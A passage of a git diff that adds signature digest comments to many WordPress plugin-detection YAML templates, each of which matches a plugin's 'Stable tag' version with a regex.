4a0a004730450221008ce10b680ef8c27c17dc49354e6c523d1165bc3cfe378489e9af9269db5772240220071a91b23bb32711a14e86c3f40f6da6dc03ee224ba18035c3bb09324cf4aec7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..504ea64c3f 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cfc0ba0c196b9059260d954d2d8aac676e5565d2b11873a40f56130be059f0af022100c7af3e5f930c5a0f5651cffe6441670d84cd07d61c7114dd699de43f14ff3691:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..63937d1643 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a5fb7ddae9922ff5c7ddaf17a7a803539798149f74c0a169ec1cdc25126ed81502203ed54f00c643cc0e22dfef63704cee0d0bc7c1442a7d167de5422650a7be385c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..d8fcf47145 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022056dd655927f2ae242ed85d50cb768bcb37572c2f4398de22c4fc320d54611b1c022100cd8bc1eac71bfa503e6d667c36c4a612a8778ddcb1cb39a824fbc1d5cb9c7a1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..6698dcb164 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220506fe0d83ab4d7f29b0272bf0d81f960858fae49341999cf21ddba327524659e022046b78ded8af13bc5f99e9471e8ec9e6a2b7e5e823bc78de351e6814d16c65520:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..9253b4354d 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c989b52766e69a3b5addbdbe637d8f35766b44e4618660effaa2682b4c6ae42f022100c70c9a533b8f43f1ac055ab2d4e765b91c3a8774d2331e015ea8fd2967fd4ef5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..886054370d 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202e4d6efcc1ca3cd823ce762e37eeb8719245f2c154d1d3d6c64d1062693eb500022100acf1aa9e6deb6de2fbe9c22a353dbea8b38721f7206e60fb9b2e81fc7650f937:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..19562fd436 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d8cd61de709603fe8b86ade9d04627ec71042dace1b197050ce94102ded76c20022069e62ba9930b731d225fdad83796edc3154764db95d250808071ef552663538c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..dfa2b1c235 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206e676d11477ad3d25979a83425a2ce4aa13ce06507f0a9b9cc74213e30674cfd022100ebe4eafc304d4d24ade9fe4e4132ec1d532595f818cc8627d099bf04df890781:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..aa80293a56 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207fdc1fb11002a9f91b18c6aeb224dcd970c1a8fa89e1e90bfd49147fda19861a022100ea7a07a3aae6c30488322dd20aa686c99c6aa8ec83afd9924792b4875620facb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..7147aca658 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100973b11625e2bc14595bd04a394b9419e7e385efa143cddcec381cf3afcf9b534022100834b5a8fc20576c4cbba95940b76b4f6f2f9cddcee8d6843f114a4ef0d5fd08f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..f20c9c3457 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200b6f50984a157674c0fd4eec934fd93137fe0b5cfd5f65309180ce04c41df983022100d2dcaab9302472d48945c7f3add3200e33e5736cc8188ad54a01a9c2676ce21d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..fa13e200dd 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100992b7e25b2336f92e2026a843a9d8e120db82bccae5bed4870a2a96ee63a71ee022100c6670430ad50724dd8ed7156d9679ca4b4c9ba0c0896d319226d648e814c4826:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..455db156cb 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009f512b80424eed162dc566ef082c41a4fd8e16d16c4f81277ab53678127187e80220269c1d42df6de24d1d4f756a622f51e16631862514c4837eaafb4e261265d154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..c29932ff34 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022052fc18c16f7115bcecc08afe766b0972d1843b709250a061621d3a2f73a98afb022100ea51f657d915039aa06f1691bef28c11ff21ec68742653b22550039a6727b516:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..478c9fda54 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200e8510e4c66b5880bcd44bcc933151c5c27df5ee0d58ef0ba87ad5bd17cbbb3f022100f2a269829e0d323933e2f456fd70ef44a9fed32f8759500ad2a7853ce601d2fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..7c1ce57e14 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210081b85b730924a1e1dd4889f4f7e0fce225e62db5eb4f66d5cc051e971f2952e9022100867bd39ecb4e088f707c6e908523d058fcc86b4cfde088cd362942508a2b1ca5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..83c05cbd56 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206c0aaef205c241a8f074070a80e9b7dced442c0d3660757cae802f3d80083358022100d948b153a9396a6caafcc3569ef7319d20b83423fe4051b1bd5012222cf96b47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..ff1a6610a3 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207360e93a25d1d783d80b8f9fe73a64ab06fc9c033e006d32b39fc6e8bb7d83eb02202ff6f93a6e8a4f1643bbe219107f099f484812f2a02d1b18f99a72303b9bed0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..c93c6080a8 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fd9fb122bec77cf740006579ba190f7296fd264105d985a88b9ad4218e693866022026786fb5af12951c7008e62f726cee6f4f168eaad2332277678617ce23b4417c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..b8d9b40638 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100adad1ad9ebbe661168184425f3696959b02744763d27169b9b96082b2f088771022009894556ff46db85c622a6f732b64178a43acdc9355413d16b95ccc0340c908e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..5c7006dc73 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008b50e59fcdf8896ef31fc0cafb1ed8c72fc45fe8b13db3ce6790f3ba4685dba40220193f18c01d37c27ae42a8e20044d38bf847054fdfa7c2f747bec23020e4d7583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..b28001258e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200510a864dbba368e1681236c37dba501df114b1d2cc8d0d33578210e9cb782c1022100b9bd450b7788dabf6e042c7626caa1a112d3bdbc8663331c6a6b438ee95a870c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..55cad5869c 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022026c747c424572c46a2ebb0f153add1d05763bf1aa2809cc0ec974e597f05f9f6022004b5208baa14d4b22f0f9b49e5d3d2026fd6f61833aef9ee13f036cb80a4a46f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..2d61768cea 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100819695e50edda2717a5f7cab57d1a278fb17ea39ad6fc7fed28898e4570d5c09022038c9c7be7f2840334f7902f9ebb7dc91bf398e68c71184b7cd00c95af1456695:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..0585435fe3 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220596f4b454cbc4b6dc907cbcfdff002e00141e63b1e0f2ad96a24256ea10a2144022100f81b3be9a60db8a3b57b90631c77f4ff70a88fd1cfaac23e0820d2a772258bc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..cfd9ee30bb 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201f3487992c216a7b0cb457b7455c3d911f04b7c4fda93036e9a84504ee4684cc022034ef11297d35dbec5876238848ebf4c05ecaac2a620f807bfdf2e1e31661a11b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..6b50a16f96 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e8c6cc354f159732b312affe3064207bf6c58da067ab6293cf1a5b11d0035dc5022005528275c6a3187a0672d69266b8ebb37b606b5368f77cde61069c01d091c355:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..3291fbd904 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203a30e98852ac8538c8114f2655e1cf14f420d96654c26b71022a76f814a7773202202c9bfc95d4c759309c54d776b7e0d1b119016dc5b538edfe95b9b1251dc46f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..fce4b0f954 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100beaa880ad470a375772bf259fd7db9761c4c2a18eaf77518dc680b57dad39a89022100fe62543ada78448b61d9d3e20f78dd833d9369a2fa3589df37ec850647fd8592:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..fb671b8292 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220416feca3071abf7eed5c53a63fd81b2fac7ed33ef4167cdf60b541a4b50a06ef022054d967cfc64c050623c80949c17553070381e46b74115e897e5a73cfc6430333:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..2ceea681d9 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204059e54e4c07b28f69fcd55d8b7e8e8f8df92d559a2ce636a3b4abd8b18a8e2e022100e9e483c7fb9a76b550447786961c087350d77020f30f0eadf163ded6ee633110:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..141d41b645 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201e66eda72d24fa37dd39400b57aee35f97025d891d7aeb2995f1c4f48262c9bb022100cc681420c2ce540b3fd3779bfeeffad78804acec275149bc43f253465b42933e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..7d82fe4819 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fd72276c60ef5f42a8bc5a75df2b7d049dab99659b9a4e286fde570fbb8641c3022100b5733be0f3304216b7d6b8371dafb14d6607fd78e7b1aac49e95ad4dbc51eb8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..4504482088 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a329fc774a2fd6eeb46533dffc1bbc0d332a905133d927feb68fe93ee8b60c66022100d09ce60481d8889ae8187fd571dc23bac5249e772a399c26fc8b5e367259ec04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..0d08b02a66 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a1ae406c484d267aff7524bb846c90609caa7268b7e65e5a7f5f2b9160a7e93602202118c29f8c4d87df1c8e9db4a35c168f1a0c20843fc7dee22200c8d38caab7b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..d235401c32 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c5070d6cb6e7a46552e043202d62dc0079a662eb551d9bd085b250365878cacc02201dd4779db1ef2847fa4b77b0adab0fa95fe5af13857a857a7250b1633bbc967d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..48a03a8c27 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207eca6d022ef5924408f25693d9a41a5cd1eb2c3c0f969946917e9010cd079c810220128eda6ef8d24b42edc7dbaaba9a06b6a5d99f5a67e19331575f016a6d1dbf96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..47c99098f5 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eba9fa48439cde753b9b8434410c711ae2b0e598820526da80dfbd125c448af40221008c162b3ca90fbfc338480335b85cf7a9eac6f1320008fcfe54468247bcf2f787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..2cf699f80d 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205eba8c3e107768cdc7fa18ca55003463141c1f9a13f2248fe71e088a92b63ae2022100afcf5deac793e8610beee622766028c55077d662cfd21505efb359c157f121c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..887effab6f 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100972c1969041261f52567d285bd196c95947f45ee8efe803f258149bb94afed7102203422fe3db461058705d03c9455d471c7a8f9519385cf20c359b51513482123dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..8e0bdd5d50 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200654fd7ee2ca4a79649e7039531c2a09dbb7522ca8916c465c7f86e0b186211c022100b2ef395cae27d399528ccb5c032c19a32dd9adc391a8332284ea60b0a8f479b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..725b8e372a 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a8e778c2eb2425ed49afe8977838b5fc7b54bcb3675ec6e21fd224627596da80022100cbf47263f93cae3ec2be6a7c8da8c217bfc32aaf6cdd2a97b7e6a81f7952b2d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..a0dace64ce 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200452431bb4c07417de74b300965b8ab4c77ad140eae90f9183551bc076dda848022100d5942fae9bb8fcea73a8f37399469469114a1f93008f32add08f48073c892395:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..7006a4b5ea 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200826ecec0ea9ae123df74a2e222f7d01f65363967f54b836b6f30b66fbc7b6b8022100b19ed29690e3b23887e652b8a46ea6f402e52cac798afc3987cf4d3db71433f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..2c3eb4ea55 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220678f05cee487f6fa4a056428cdb30d19a29b4a156fbf01bee27a702ad379aa3302203a3b0573b50b8cb6d13ae5bb55611cf10f51aae824813a34ddbfa487c9fc0685:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..61616ea0fe 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206622d13663e7a1abe06988b388dd34eceaa162c67767c6c57a3fd2bf9c96330d022100e307fd1406b041ff219ffb9818a52605a1dc510d86c8d29b6e7d4c9256aed9ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..ba19bbdb9c 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 